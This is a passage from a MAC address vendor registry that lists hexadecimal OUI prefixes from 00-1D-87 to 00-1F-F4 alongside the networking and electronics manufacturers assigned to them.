Shinwa Industries(China) Ltd. 00-1D-87 (hex) VigTech Labs Sdn Bhd 00-1D-88 (hex) Clearwire 00-1D-89 (hex) VaultStor Corporation 00-1D-8A (hex) TechTrex Inc 00-1D-8B (hex) PIRELLI BROADBAND SOLUTIONS 00-1D-8C (hex) La Crosse Technology LTD 00-1D-8D (hex) Raytek GmbH 00-1D-8E (hex) Alereon, Inc. 00-1D-8F (hex) PureWave Networks 00-1D-90 (hex) EMCO Flow Systems 00-1D-91 (hex) Digitize, Inc 00-1D-92 (hex) MICRO-STAR INT'L CO.,LTD. 00-1D-93 (hex) Modacom 00-1D-94 (hex) Climax Technology Co., Ltd 00-1D-95 (hex) Flash, Inc. 00-1D-96 (hex) WatchGuard Video 00-1D-97 (hex) Alertus Technologies LLC 00-1D-98 (hex) Nokia Danmark A/S 00-1D-99 (hex) Cyan Optic, Inc. 00-1D-9A (hex) GODEX INTERNATIONAL CO., LTD 00-1D-9B (hex) Hokuyo Automatic Co., Ltd. 00-1D-9C (hex) Rockwell Automation 00-1D-9D (hex) ARTJOY INTERNATIONAL LIMITED 00-1D-9E (hex) AXION TECHNOLOGIES 00-1D-9F (hex) MATT R.P.Traczynscy Sp.J. 00-1D-A0 (hex) Heng Yu Electronic Manufacturing Company Limited 00-1D-A1 (hex) Cisco Systems 00-1D-A2 (hex) Cisco Systems 00-1D-A3 (hex) SabiOso 00-1D-A4 (hex) Hangzhou System Technology CO., LTD 00-1D-A5 (hex) WB Electronics 00-1D-A6 (hex) Media Numerics Limited 00-1D-A7 (hex) Seamless Internet 00-1D-A8 (hex) Takahata Electronics Co.,Ltd 00-1D-A9 (hex) Castles Technology, Co., LTD 00-1D-AA (hex) DrayTek Corp. 00-1D-AB (hex) SwissQual License AG 00-1D-AC (hex) Gigamon Systems LLC 00-1D-AD (hex) Sinotech Engineering Consultants, Inc. Geotechnical Enginee 00-1D-AE (hex) CHANG TSENG TECHNOLOGY CO., LTD 00-1D-AF (hex) Nortel 00-1D-B0 (hex) FuJian HengTong Information Technology Co.,Ltd 00-1D-B1 (hex) Crescendo Networks 00-1D-B2 (hex) HOKKAIDO ELECTRIC ENGINEERING CO.,LTD. 00-1D-B3 (hex) ProCurve Networking by HP 00-1D-B4 (hex) KUMHO ENG CO.,LTD 00-1D-B5 (hex) Juniper networks 00-1D-B6 (hex) BestComm Networks, Inc. 00-1D-B7 (hex) Tendril Networks, Inc. 00-1D-B8 (hex) Intoto Inc. 00-1D-B9 (hex) Wellspring Wireless 00-1D-BA (hex) Sony Corporation 00-1D-BB (hex) Dynamic System Electronics Corp. 00-1D-BC (hex) Nintendo Co., Ltd. 00-1D-BD (hex) Versamed Inc. 00-1D-BE (hex) Motorola Mobility, Inc. 00-1D-BF (hex) Radiient Technologies, Inc. 00-1D-C0 (hex) Enphase Energy 00-1D-C1 (hex) Audinate Pty L 00-1D-C2 (hex) XORTEC OY 00-1D-C3 (hex) RIKOR TV, Ltd 00-1D-C4 (hex) AIOI Systems Co., Ltd. 00-1D-C5 (hex) Beijing Jiaxun Feihong Electricial Co., Ltd. 00-1D-C6 (hex) SNR Inc. 00-1D-C7 (hex) L-3 Communications Geneva Aerospace 00-1D-C8 (hex) ScadaMetrcs, LLC. 00-1D-C9 (hex) GainSpan Corp. 00-1D-CA (hex) PAV Electronics Limited 00-1D-CB (hex) Exéns Development Oy 00-1D-CC (hex) Hetra Secure Solutions 00-1D-CD (hex) ARRIS Group, Inc. 00-1D-CE (hex) ARRIS Group, Inc. 00-1D-CF (hex) ARRIS Group, Inc. 00-1D-D0 (hex) ARRIS Group, Inc. 00-1D-D1 (hex) ARRIS Group, Inc. 00-1D-D2 (hex) ARRIS Group, Inc. 00-1D-D3 (hex) ARRIS Group, Inc. 00-1D-D4 (hex) ARRIS Group, Inc. 00-1D-D5 (hex) ARRIS Group, Inc. 00-1D-D6 (hex) ARRIS Group, Inc. 00-1D-D7 (hex) Algolith 00-1D-D8 (hex) Microsoft Corporation 00-1D-D9 (hex) Hon Hai Precision Ind.Co.,Ltd. 00-1D-DA (hex) Mikroelektronika spol. s r. o. 00-1D-DB (hex) C-BEL Corporation 00-1D-DC (hex) HangZhou DeChangLong Tech&Info Co.,Ltd 00-1D-DD (hex) DAT H.K. LIMITED 00-1D-DE (hex) Zhejiang Broadcast&Television Technology Co.,Ltd. 00-1D-DF (hex) Sunitec Enterprise Co., Ltd. 00-1D-E0 (hex) Intel Corporate 00-1D-E1 (hex) Intel Corporate 00-1D-E2 (hex) Radionor Communications 00-1D-E3 (hex) Intuicom 00-1D-E4 (hex) Visioneered Image Systems 00-1D-E5 (hex) Cisco Systems 00-1D-E6 (hex) Cisco Systems 00-1D-E7 (hex) Marine Sonic Technology, Ltd. 00-1D-E8 (hex) Nikko Denki Tsushin Company(NDTC) 00-1D-E9 (hex) Nokia Danmark A/S 00-1D-EA (hex) Commtest Instruments Ltd 00-1D-EB (hex) DINEC International 00-1D-EC (hex) Marusys 00-1D-ED (hex) Grid Net, Inc. 00-1D-EE (hex) NEXTVISION SISTEMAS DIGITAIS DE TELEVISÃO LTDA. 00-1D-EF (hex) TRIMM, INC. 00-1D-F0 (hex) Vidient Systems, Inc. 00-1D-F1 (hex) Intego Systems, Inc. 00-1D-F2 (hex) Netflix, Inc. 00-1D-F3 (hex) SBS Science & Technology Co., Ltd 00-1D-F4 (hex) Magellan Technology Pty Limited 00-1D-F5 (hex) Sunshine Co,LTD 00-1D-F6 (hex) Samsung Electronics Co.,Ltd 00-1D-F7 (hex) R. STAHL Schaltgeräte GmbH 00-1D-F8 (hex) Webpro Vision Technology Corporation 00-1D-F9 (hex) Cybiotronics (Far East) Limited 00-1D-FA (hex) Fujian LANDI Commercial Equipment Co.,Ltd 00-1D-FB (hex) NETCLEUS Systems Corporation 00-1D-FC (hex) KSIC 00-1D-FD (hex) Nokia Danmark A/S 00-1D-FE (hex) Palm, Inc 00-1D-FF (hex) Network Critical Solutions Ltd 00-1E-00 (hex) Shantou Institute of Ultrasonic Instruments 00-1E-01 (hex) Renesas Technology Sales Co., Ltd. 00-1E-02 (hex) Sougou Keikaku Kougyou Co.,Ltd. 00-1E-03 (hex) LiComm Co., Ltd. 00-1E-04 (hex) Hanson Research Corporation 00-1E-05 (hex) Xseed Technologies & Computing 00-1E-06 (hex) WIBRAIN 00-1E-07 (hex) Winy Technology Co., Ltd. 00-1E-08 (hex) Centec Networks Inc 00-1E-09 (hex) ZEFATEK Co.,LTD 00-1E-0A (hex) Syba Tech Limited 00-1E-0B (hex) Hewlett-Packard Company 00-1E-0C (hex) Sherwood Information Partners, Inc. 00-1E-0D (hex) Micran Ltd. 00-1E-0E (hex) MAXI VIEW HOLDINGS LIMITED 00-1E-0F (hex) Briot International 00-1E-10 (hex) ShenZhen Huawei Communication Technologies Co.,Ltd. 00-1E-11 (hex) ELELUX INTERNATIONAL LTD 00-1E-12 (hex) Ecolab 00-1E-13 (hex) Cisco Systems 00-1E-14 (hex) Cisco Systems 00-1E-15 (hex) Beech Hill Electronics 00-1E-16 (hex) Keytronix 00-1E-17 (hex) STN BV 00-1E-18 (hex) Radio Activity srl 00-1E-19 (hex) GTRI 00-1E-1A (hex) Best Source Taiwan Inc. 00-1E-1B (hex) Digital Stream Technology, Inc. 00-1E-1C (hex) SWS Australia Pty Limited 00-1E-1D (hex) East Coast Datacom, Inc. 00-1E-1E (hex) Honeywell Life Safety 00-1E-1F (hex) Nortel 00-1E-20 (hex) Intertain Inc. 00-1E-21 (hex) Qisda Co. 00-1E-22 (hex) ARVOO Imaging Products BV 00-1E-23 (hex) Electronic Educational Devices, Inc 00-1E-24 (hex) Zhejiang Bell Technology Co.,ltd 00-1E-25 (hex) Intek Digital Inc 00-1E-26 (hex) Digifriends Co. Ltd 00-1E-27 (hex) SBN TECH Co.,Ltd. 00-1E-28 (hex) Lumexis Corporation 00-1E-29 (hex) Hypertherm Inc 00-1E-2A (hex) Netgear Inc. 00-1E-2B (hex) Radio Systems Design, Inc. 00-1E-2C (hex) CyVerse Corporation 00-1E-2D (hex) STIM 00-1E-2E (hex) SIRTI S.p.A. 00-1E-2F (hex) DiMoto Pty Ltd 00-1E-30 (hex) Shireen Inc 00-1E-31 (hex) INFOMARK CO.,LTD. 00-1E-32 (hex) Zensys 00-1E-33 (hex) Inventec Corporation 00-1E-34 (hex) CryptoMetrics 00-1E-35 (hex) Nintendo Co., Ltd. 00-1E-36 (hex) IPTE 00-1E-37 (hex) Universal Global Scientific Industrial Co., Ltd. 00-1E-38 (hex) Bluecard Software Technology Co., Ltd. 00-1E-39 (hex) Comsys Communication Ltd. 00-1E-3A (hex) Nokia Danmark A/S 00-1E-3B (hex) Nokia Danmark A/S 00-1E-3C (hex) Lyngbox Media AB 00-1E-3D (hex) Alps Electric Co., Ltd 00-1E-3E (hex) KMW Inc. 00-1E-3F (hex) TrellisWare Technologies, Inc. 00-1E-40 (hex) Shanghai DareGlobal Technologies Co.,Ltd. 00-1E-41 (hex) Microwave Communication & Component, Inc. 00-1E-42 (hex) Teltonika 00-1E-43 (hex) AISIN AW CO.,LTD. 00-1E-44 (hex) SANTEC 00-1E-45 (hex) Sony Ericsson Mobile Communications AB 00-1E-46 (hex) Motorola Mobility, Inc. 00-1E-47 (hex) PT. Hariff Daya Tunggal Engineering 00-1E-48 (hex) Wi-Links 00-1E-49 (hex) Cisco Systems 00-1E-4A (hex) Cisco Systems 00-1E-4B (hex) City Theatrical 00-1E-4C (hex) Hon Hai Precision Ind.Co., Ltd. 00-1E-4D (hex) Welkin Sciences, LLC 00-1E-4E (hex) DAKO EDV-Ingenieur- und Systemhaus GmbH 00-1E-4F (hex) Dell Inc. 00-1E-50 (hex) BATTISTONI RESEARCH 00-1E-51 (hex) Converter Industry Srl 00-1E-52 (hex) Apple Computer Inc 00-1E-53 (hex) Further Tech Co., LTD 00-1E-54 (hex) TOYO ELECTRIC Corporation 00-1E-55 (hex) COWON SYSTEMS,Inc. 00-1E-56 (hex) Bally Wulff Entertainment GmbH 00-1E-57 (hex) ALCOMA, spol. s r.o. 00-1E-58 (hex) D-Link Corporation 00-1E-59 (hex) Silicon Turnkey Express, LLC 00-1E-5A (hex) Motorola Mobility, Inc. 00-1E-5B (hex) Unitron Company, Inc. 00-1E-5C (hex) RB GeneralEkonomik 00-1E-5D (hex) Holosys d.o.o. 00-1E-5E (hex) COmputime Ltd. 00-1E-5F (hex) KwikByte, LLC 00-1E-60 (hex) Digital Lighting Systems, Inc 00-1E-61 (hex) ITEC GmbH 00-1E-62 (hex) Siemon 00-1E-63 (hex) Vibro-Meter SA 00-1E-64 (hex) Intel Corporate 00-1E-65 (hex) Intel Corporate 00-1E-66 (hex) RESOL Elektronische Regelungen GmbH 00-1E-67 (hex) Intel Corporate 00-1E-68 (hex) Quanta Computer 00-1E-69 (hex) Thomson Inc. 00-1E-6A (hex) Beijing Bluexon Technology Co.,Ltd 00-1E-6B (hex) Scientific Atlanta, A Cisco Company 00-1E-6C (hex) Carbon Mountain LLC 00-1E-6D (hex) IT R&D Center 00-1E-6E (hex) Shenzhen First Mile Communications Ltd 00-1E-6F (hex) Magna-Power Electronics, Inc. 00-1E-70 (hex) Cobham Defence Communications Ltd 00-1E-71 (hex) IgeaCare Systems Inc. 00-1E-72 (hex) PCS 00-1E-73 (hex) ZTE CORPORATION 00-1E-74 (hex) SAGEM COMMUNICATION 00-1E-75 (hex) LG Electronics 00-1E-76 (hex) Thermo Fisher Scientific 00-1E-77 (hex) Air2App 00-1E-78 (hex) Owitek Technology Ltd., 00-1E-79 (hex) Cisco Systems 00-1E-7A (hex) Cisco Systems 00-1E-7B (hex) R.I.CO. S.r.l. 00-1E-7C (hex) Taiwick Limited 00-1E-7D (hex) Samsung Electronics Co.,Ltd 00-1E-7E (hex) Nortel 00-1E-7F (hex) CBM of America 00-1E-80 (hex) Last Mile Ltd. 00-1E-81 (hex) CNB Technology Inc. 00-1E-82 (hex) SanDisk Corporation 00-1E-83 (hex) LAN/MAN Standards Association (LMSC) 00-1E-84 (hex) Pika Technologies Inc. 00-1E-85 (hex) Lagotek Corporation 00-1E-86 (hex) MEL Co.,Ltd. 00-1E-87 (hex) Realease Limited 00-1E-88 (hex) ANDOR SYSTEM SUPPORT CO., LTD. 00-1E-89 (hex) CRFS Limited 00-1E-8A (hex) eCopy, Inc 00-1E-8B (hex) Infra Access Korea Co., Ltd. 00-1E-8C (hex) ASUSTek COMPUTER INC. 00-1E-8D (hex) Motorola Mobility, Inc. 00-1E-8E (hex) Hunkeler AG 00-1E-8F (hex) CANON INC. 00-1E-90 (hex) Elitegroup Computer Systems Co 00-1E-91 (hex) KIMIN Electronic Co., Ltd. 00-1E-92 (hex) JEULIN S.A. 00-1E-93 (hex) CiriTech Systems Inc 00-1E-94 (hex) SUPERCOM TECHNOLOGY CORPORATION 00-1E-95 (hex) SIGMALINK 00-1E-96 (hex) Sepura Plc 00-1E-97 (hex) Medium Link System Technology CO., LTD, 00-1E-98 (hex) GreenLine Communications 00-1E-99 (hex) Vantanol Industrial Corporation 00-1E-9A (hex) HAMILTON Bonaduz AG 00-1E-9B (hex) San-Eisha, Ltd. 00-1E-9C (hex) Fidustron INC 00-1E-9D (hex) Recall Technologies, Inc. 00-1E-9E (hex) ddm hopt + schuler Gmbh + Co. KG 00-1E-9F (hex) Visioneering Systems, Inc. 00-1E-A0 (hex) XLN-t 00-1E-A1 (hex) Brunata a/s 00-1E-A2 (hex) Symx Systems, Inc. 00-1E-A3 (hex) Nokia Danmark A/S 00-1E-A4 (hex) Nokia Danmark A/S 00-1E-A5 (hex) ROBOTOUS, Inc. 00-1E-A6 (hex) Best IT World (India) Pvt. Ltd. 00-1E-A7 (hex) ActionTec Electronics, Inc 00-1E-A8 (hex) Datang Mobile Communications Equipment CO.,LTD 00-1E-A9 (hex) Nintendo Co., Ltd. 00-1E-AA (hex) E-Senza Technologies GmbH 00-1E-AB (hex) TeleWell Oy 00-1E-AC (hex) Armadeus Systems 00-1E-AD (hex) Wingtech Group Limited 00-1E-AE (hex) Continental Automotive Systems 00-1E-AF (hex) Ophir Optronics Ltd 00-1E-B0 (hex) ImesD Electronica S.L. 00-1E-B1 (hex) Cryptsoft Pty Ltd 00-1E-B2 (hex) LG innotek 00-1E-B3 (hex) Primex Wireless 00-1E-B4 (hex) UNIFAT TECHNOLOGY LTD. 00-1E-B5 (hex) Ever Sparkle Technologies Ltd 00-1E-B6 (hex) TAG Heuer SA la Chaux-de-Fonds NE 2300 00-1E-B7 (hex) TBTech, Co., Ltd. 00-1E-B8 (hex) Fortis, Inc. 00-1E-B9 (hex) Sing Fai Technology Limited 00-1E-BA (hex) High Density Devices AS 00-1E-BB (hex) BLUELIGHT TECHNOLOGY INC. 00-1E-BC (hex) WINTECH AUTOMATION CO.,LTD. 00-1E-BD (hex) Cisco Systems 00-1E-BE (hex) Cisco Systems 00-1E-BF (hex) Haas Automation Inc. 00-1E-C0 (hex) Microchip Technology Inc. 00-1E-C1 (hex) 3COM EUROPE LTD 00-1E-C2 (hex) Apple, Inc 00-1E-C3 (hex) Kozio, Inc. 00-1E-C4 (hex) Celio Corp 00-1E-C5 (hex) Middle Atlantic Products Inc 00-1E-C6 (hex) Obvius Holdings LLC 00-1E-C7 (hex) 2Wire 00-1E-C8 (hex) Rapid Mobile (Pty) Ltd 00-1E-C9 (hex) Dell Inc 00-1E-CA (hex) Nortel 00-1E-CB (hex) "RPC "Energoautomatika" Ltd 00-1E-CC (hex) CDVI 00-1E-CD (hex) KYLAND 00-1E-CE (hex) BISA Technologies (Hong Kong) Limited 00-1E-CF (hex) PHILIPS ELECTRONICS UK LTD 00-1E-D0 (hex) CONNEXIUM 00-1E-D1 (hex) Keyprocessor B.V. 00-1E-D2 (hex) Ray Shine Video Technology Inc 00-1E-D3 (hex) Dot Technology Int'l Co., Ltd. 00-1E-D4 (hex) Doble Engineering 00-1E-D5 (hex) Tekon-Automatics 00-1E-D6 (hex) Alentec & Orion AB 00-1E-D7 (hex) H-Stream Wireless, Inc. 00-1E-D8 (hex) Digital United Inc. 00-1E-D9 (hex) Mitsubishi Precision Co.,LTd. 00-1E-DA (hex) Wesemann Elektrotechniek B.V. 00-1E-DB (hex) Giken Trastem Co., Ltd. 00-1E-DC (hex) Sony Ericsson Mobile Communications AB 00-1E-DD (hex) WASKO S.A. 00-1E-DE (hex) BYD COMPANY LIMITED 00-1E-DF (hex) Master Industrialization Center Kista 00-1E-E0 (hex) Urmet Domus SpA 00-1E-E1 (hex) Samsung Electronics Co.,Ltd 00-1E-E2 (hex) Samsung Electronics Co.,Ltd 00-1E-E3 (hex) T&W Electronics (ShenZhen) Co.,Ltd 00-1E-E4 (hex) ACS Solutions France 00-1E-E5 (hex) Cisco-Linksys, LLC 00-1E-E6 (hex) Shenzhen Advanced Video Info-Tech Co., Ltd. 00-1E-E7 (hex) Epic Systems Inc 00-1E-E8 (hex) Mytek 00-1E-E9 (hex) Stoneridge Electronics AB 00-1E-EA (hex) Sensor Switch, Inc. 00-1E-EB (hex) Talk-A-Phone Co. 00-1E-EC (hex) COMPAL INFORMATION (KUNSHAN) CO., LTD. 00-1E-ED (hex) Adventiq Ltd. 00-1E-EE (hex) ETL Systems Ltd 00-1E-EF (hex) Cantronic International Limited 00-1E-F0 (hex) Gigafin Networks 00-1E-F1 (hex) Servimat 00-1E-F2 (hex) Micro Motion Inc 00-1E-F3 (hex) From2 00-1E-F4 (hex) L-3 Communications Display Systems 00-1E-F5 (hex) Hitek Automated Inc. 00-1E-F6 (hex) Cisco Systems 00-1E-F7 (hex) Cisco Systems 00-1E-F8 (hex) Emfinity Inc. 00-1E-F9 (hex) Pascom Kommunikations systeme GmbH. 00-1E-FA (hex) PROTEI Ltd. 00-1E-FB (hex) Trio Motion Technology Ltd 00-1E-FC (hex) JSC "MASSA-K" 00-1E-FD (hex) Microbit 2.0 AB 00-1E-FE (hex) LEVEL s.r.o. 00-1E-FF (hex) Mueller-Elektronik GmbH & Co. KG 00-1F-00 (hex) Nokia Danmark A/S 00-1F-01 (hex) Nokia Danmark A/S 00-1F-02 (hex) Pixelmetrix Corporation Pte Ltd 00-1F-03 (hex) NUM AG 00-1F-04 (hex) Granch Ltd. 00-1F-05 (hex) iTAS Technology Corp. 00-1F-06 (hex) Integrated Dispatch Solutions 00-1F-07 (hex) AZTEQ Mobile 00-1F-08 (hex) RISCO LTD 00-1F-09 (hex) JASTEC CO., LTD. 00-1F-0A (hex) Nortel 00-1F-0B (hex) Federal State Unitary Enterprise Industrial Union"Electropribor" 00-1F-0C (hex) Intelligent Digital Services GmbH 00-1F-0D (hex) L3 Communications - Telemetry West 00-1F-0E (hex) Japan Kyastem Co., Ltd 00-1F-0F (hex) Select Engineered Systems 00-1F-10 (hex) TOLEDO DO BRASIL INDUSTRIA DE BALANCAS LTDA 00-1F-11 (hex) OPENMOKO, INC. 00-1F-12 (hex) Juniper Networks 00-1F-13 (hex) S.& A.S. Ltd. 00-1F-14 (hex) NexG 00-1F-15 (hex) Bioscrypt Inc 00-1F-16 (hex) Wistron Corporation 00-1F-17 (hex) IDX Company, Ltd. 00-1F-18 (hex) Hakusan.Mfg.Co,.Ltd 00-1F-19 (hex) BEN-RI ELECTRONICA S.A. 00-1F-1A (hex) Prominvest 00-1F-1B (hex) RoyalTek Company Ltd. 00-1F-1C (hex) KOBISHI ELECTRIC Co.,Ltd. 00-1F-1D (hex) Atlas Material Testing Technology LLC 00-1F-1E (hex) Astec Technology Co., Ltd 00-1F-1F (hex) Edimax Technology Co. Ltd. 00-1F-20 (hex) Logitech Europe SA 00-1F-21 (hex) Inner Mongolia Yin An Science & Technology Development Co.,L 00-1F-22 (hex) Source Photonics, Inc. 00-1F-23 (hex) Interacoustics 00-1F-24 (hex) DIGITVIEW TECHNOLOGY CO., LTD. 00-1F-25 (hex) MBS GmbH 00-1F-26 (hex) Cisco Systems 00-1F-27 (hex) Cisco Systems 00-1F-28 (hex) ProCurve Networking by HP 00-1F-29 (hex) Hewlett-Packard Company 00-1F-2A (hex) ACCM 00-1F-2B (hex) Orange Logic 00-1F-2C (hex) Starbridge Networks 00-1F-2D (hex) Electro-Optical Imaging, Inc. 00-1F-2E (hex) Triangle Research Int'l Pte Ltd 00-1F-2F (hex) Berker GmbH & Co. KG 00-1F-30 (hex) Travelping 00-1F-31 (hex) Radiocomp 00-1F-32 (hex) Nintendo Co., Ltd. 00-1F-33 (hex) Netgear Inc. 00-1F-34 (hex) Lung Hwa Electronics Co., Ltd. 00-1F-35 (hex) AIR802 LLC 00-1F-36 (hex) Bellwin Information Co. Ltd., 00-1F-37 (hex) Genesis I&C 00-1F-38 (hex) POSITRON 00-1F-39 (hex) Construcciones y Auxiliar de Ferrocarriles, S.A. 00-1F-3A (hex) Hon Hai Precision Ind.Co., Ltd. 00-1F-3B (hex) Intel Corporate 00-1F-3C (hex) Intel Corporate 00-1F-3D (hex) Qbit GmbH 00-1F-3E (hex) RP-Technik e.K. 00-1F-3F (hex) AVM GmbH 00-1F-40 (hex) Speakercraft Inc. 00-1F-41 (hex) Ruckus Wireless 00-1F-42 (hex) Etherstack Pty Ltd 00-1F-43 (hex) ENTES ELEKTRONIK 00-1F-44 (hex) GE Transportation Systems 00-1F-45 (hex) Enterasys 00-1F-46 (hex) Nortel 00-1F-47 (hex) MCS Logic Inc. 00-1F-48 (hex) Mojix Inc. 00-1F-49 (hex) Eurosat Distribution Ltd 00-1F-4A (hex) Albentia Systems S.A. 00-1F-4B (hex) Lineage Power 00-1F-4C (hex) Roseman Engineering Ltd 00-1F-4D (hex) Segnetics LLC 00-1F-4E (hex) ConMed Linvatec 00-1F-4F (hex) Thinkware Co. Ltd. 00-1F-50 (hex) Swissdis AG 00-1F-51 (hex) HD Communications Corp 00-1F-52 (hex) UVT Unternehmensberatung für Verkehr und Technik GmbH 00-1F-53 (hex) GEMAC Gesellschaft für Mikroelektronikanwendung Chemnitz mbH 00-1F-54 (hex) Lorex Technology Inc. 00-1F-55 (hex) Honeywell Security (China) Co., Ltd. 00-1F-56 (hex) DIGITAL FORECAST 00-1F-57 (hex) Phonik Innovation Co.,LTD 00-1F-58 (hex) EMH Energiemesstechnik GmbH 00-1F-59 (hex) Kronback Tracers 00-1F-5A (hex) Beckwith Electric Co. 00-1F-5B (hex) Apple, Inc. 00-1F-5C (hex) Nokia Danmark A/S 00-1F-5D (hex) Nokia Danmark A/S 00-1F-5E (hex) Dyna Technology Co.,Ltd. 00-1F-5F (hex) Blatand GmbH 00-1F-60 (hex) COMPASS SYSTEMS CORP. 00-1F-61 (hex) Talent Communication Networks Inc. 00-1F-62 (hex) JSC "Stilsoft" 00-1F-63 (hex) JSC Goodwin-Europa 00-1F-64 (hex) Beijing Autelan Technology Inc. 00-1F-65 (hex) KOREA ELECTRIC TERMINAL CO., LTD. 00-1F-66 (hex) PLANAR LLC 00-1F-67 (hex) Hitachi,Ltd. 00-1F-68 (hex) Martinsson Elektronik AB 00-1F-69 (hex) Pingood Technology Co., Ltd. 00-1F-6A (hex) PacketFlux Technologies, Inc. 00-1F-6B (hex) LG Electronics 00-1F-6C (hex) Cisco Systems 00-1F-6D (hex) Cisco Systems 00-1F-6E (hex) Vtech Engineering Corporation 00-1F-6F (hex) Fujian Sunnada Communication Co.,Ltd. 00-1F-70 (hex) Botik Technologies LTD 00-1F-71 (hex) xG Technology, Inc. 00-1F-72 (hex) QingDao Hiphone Technology Co,.Ltd 00-1F-73 (hex) Teraview Technology Co., Ltd. 00-1F-74 (hex) Eigen Development 00-1F-75 (hex) GiBahn Media 00-1F-76 (hex) AirLogic Systems Inc. 00-1F-77 (hex) HEOL DESIGN 00-1F-78 (hex) Blue Fox Porini Textile 00-1F-79 (hex) Lodam Electronics A/S 00-1F-7A (hex) WiWide Inc. 00-1F-7B (hex) TechNexion Ltd. 00-1F-7C (hex) Witelcom AS 00-1F-7D (hex) embedded wireless GmbH 00-1F-7E (hex) Motorola Mobility, Inc. 00-1F-7F (hex) Phabrix Limited 00-1F-80 (hex) Lucas Holding bv 00-1F-81 (hex) Accel Semiconductor Corp 00-1F-82 (hex) Cal-Comp Electronics & Communications Co., Ltd 00-1F-83 (hex) Teleplan Technology Services Sdn Bhd 00-1F-84 (hex) Gigle Semiconductor 00-1F-85 (hex) Apriva ISS, LLC 00-1F-86 (hex) digEcor 00-1F-87 (hex) Skydigital Inc. 00-1F-88 (hex) FMS Force Measuring Systems AG 00-1F-89 (hex) Signalion GmbH 00-1F-8A (hex) Ellion Digital Inc. 00-1F-8B (hex) Cache IQ 00-1F-8C (hex) CCS Inc. 00-1F-8D (hex) Ingenieurbuero Stark GmbH und Ko. KG 00-1F-8E (hex) Metris USA Inc. 00-1F-8F (hex) Shanghai Bellmann Digital Source Co.,Ltd. 00-1F-90 (hex) Actiontec Electronics, Inc 00-1F-91 (hex) DBS Lodging Technologies, LLC 00-1F-92 (hex) VideoIQ, Inc. 00-1F-93 (hex) Xiotech Corporation 00-1F-94 (hex) Lascar Electronics Ltd 00-1F-95 (hex) SAGEM COMMUNICATION 00-1F-96 (hex) APROTECH CO.LTD 00-1F-97 (hex) BERTANA SRL 00-1F-98 (hex) DAIICHI-DENTSU LTD. 00-1F-99 (hex) SERONICS co.ltd 00-1F-9A (hex) Nortel Networks 00-1F-9B (hex) POSBRO 00-1F-9C (hex) LEDCO 00-1F-9D (hex) Cisco Systems 00-1F-9E (hex) Cisco Systems 00-1F-9F (hex) Thomson Telecom Belgium 00-1F-A0 (hex) A10 Networks 00-1F-A1 (hex) Gtran Inc 00-1F-A2 (hex) Datron World Communications, Inc. 00-1F-A3 (hex) T&W Electronics(Shenzhen)Co.,Ltd. 00-1F-A4 (hex) ShenZhen Gongjin Electronics Co.,Ltd 00-1F-A5 (hex) Blue-White Industries 00-1F-A6 (hex) Stilo srl 00-1F-A7 (hex) Sony Computer Entertainment Inc. 00-1F-A8 (hex) Smart Energy Instruments Inc. 00-1F-A9 (hex) Atlanta DTH, Inc. 00-1F-AA (hex) Taseon, Inc. 00-1F-AB (hex) I.S HIGH TECH.INC 00-1F-AC (hex) Goodmill Systems Ltd 00-1F-AD (hex) Brown Innovations, Inc 00-1F-AE (hex) Blick South Africa (Pty) Ltd 00-1F-AF (hex) NextIO, Inc. 00-1F-B0 (hex) TimeIPS, Inc. 00-1F-B1 (hex) Cybertech Inc. 00-1F-B2 (hex) Sontheim Industrie Elektronik GmbH 00-1F-B3 (hex) 2Wire 00-1F-B4 (hex) SmartShare Systems 00-1F-B5 (hex) I/O Interconnect Inc. 00-1F-B6 (hex) Chi Lin Technology Co., Ltd. 00-1F-B7 (hex) WiMate Technologies Corp. 00-1F-B8 (hex) Universal Remote Control, Inc. 00-1F-B9 (hex) Paltronics 00-1F-BA (hex) BoYoung Tech. & Marketing, Inc. 00-1F-BB (hex) Xenatech Co.,LTD 00-1F-BC (hex) EVGA Corporation 00-1F-BD (hex) Kyocera Wireless Corp. 00-1F-BE (hex) Shenzhen Mopnet Industrial Co.,Ltd 00-1F-BF (hex) Fulhua Microelectronics Corp. Taiwan Branch 00-1F-C0 (hex) Control Express Finland Oy 00-1F-C1 (hex) Hanlong Technology Co.,LTD 00-1F-C2 (hex) Jow Tong Technology Co Ltd 00-1F-C3 (hex) SmartSynch, Inc 00-1F-C4 (hex) Motorola Mobility, Inc. 00-1F-C5 (hex) Nintendo Co., Ltd. 00-1F-C6 (hex) ASUSTek COMPUTER INC. 00-1F-C7 (hex) Casio Hitachi Mobile Comunications Co., Ltd. 00-1F-C8 (hex) Up-Today Industrial Co., Ltd. 00-1F-C9 (hex) Cisco Systems 00-1F-CA (hex) Cisco Systems 00-1F-CB (hex) NIW Solutions 00-1F-CC (hex) Samsung Electronics Co.,Ltd 00-1F-CD (hex) Samsung Electronics 00-1F-CE (hex) QTECH LLC 00-1F-CF (hex) MSI Technology GmbH 00-1F-D0 (hex) GIGA-BYTE TECHNOLOGY CO.,LTD. 00-1F-D1 (hex) OPTEX CO.,LTD. 00-1F-D2 (hex) COMMTECH TECHNOLOGY MACAO COMMERCIAL OFFSHORE LTD. 00-1F-D3 (hex) RIVA Networks Inc. 00-1F-D4 (hex) 4IPNET, INC. 00-1F-D5 (hex) MICRORISC s.r.o. 00-1F-D6 (hex) Shenzhen Allywll 00-1F-D7 (hex) TELERAD SA 00-1F-D8 (hex) A-TRUST COMPUTER CORPORATION 00-1F-D9 (hex) RSD Communications Ltd 00-1F-DA (hex) Nortel Networks 00-1F-DB (hex) Network Supply Corp., 00-1F-DC (hex) Mobile Safe Track Ltd 00-1F-DD (hex) GDI LLC 00-1F-DE (hex) Nokia Danmark A/S 00-1F-DF (hex) Nokia Danmark A/S 00-1F-E0 (hex) EdgeVelocity Corp 00-1F-E1 (hex) Hon Hai Precision Ind. Co., Ltd. 00-1F-E2 (hex) Hon Hai Precision Ind. Co., Ltd. 00-1F-E3 (hex) LG Electronics 00-1F-E4 (hex) Sony Ericsson Mobile Communications 00-1F-E5 (hex) In-Circuit GmbH 00-1F-E6 (hex) Alphion Corporation 00-1F-E7 (hex) Simet 00-1F-E8 (hex) KURUSUGAWA Electronics Industry Inc,. 00-1F-E9 (hex) Printrex, Inc. 00-1F-EA (hex) Applied Media Technologies Corporation 00-1F-EB (hex) Trio Datacom Pty Ltd 00-1F-EC (hex) Synapse électronique 00-1F-ED (hex) Tecan Systems Inc. 00-1F-EE (hex) ubisys technologies GmbH 00-1F-EF (hex) SHINSEI INDUSTRIES CO.,LTD 00-1F-F0 (hex) Audio Partnership 00-1F-F1 (hex) Paradox Hellas S.A. 00-1F-F2 (hex) VIA Technologies, Inc. 00-1F-F3 (hex) Apple, Inc 00-1F-F4 (hex) Power Monitors, Inc. 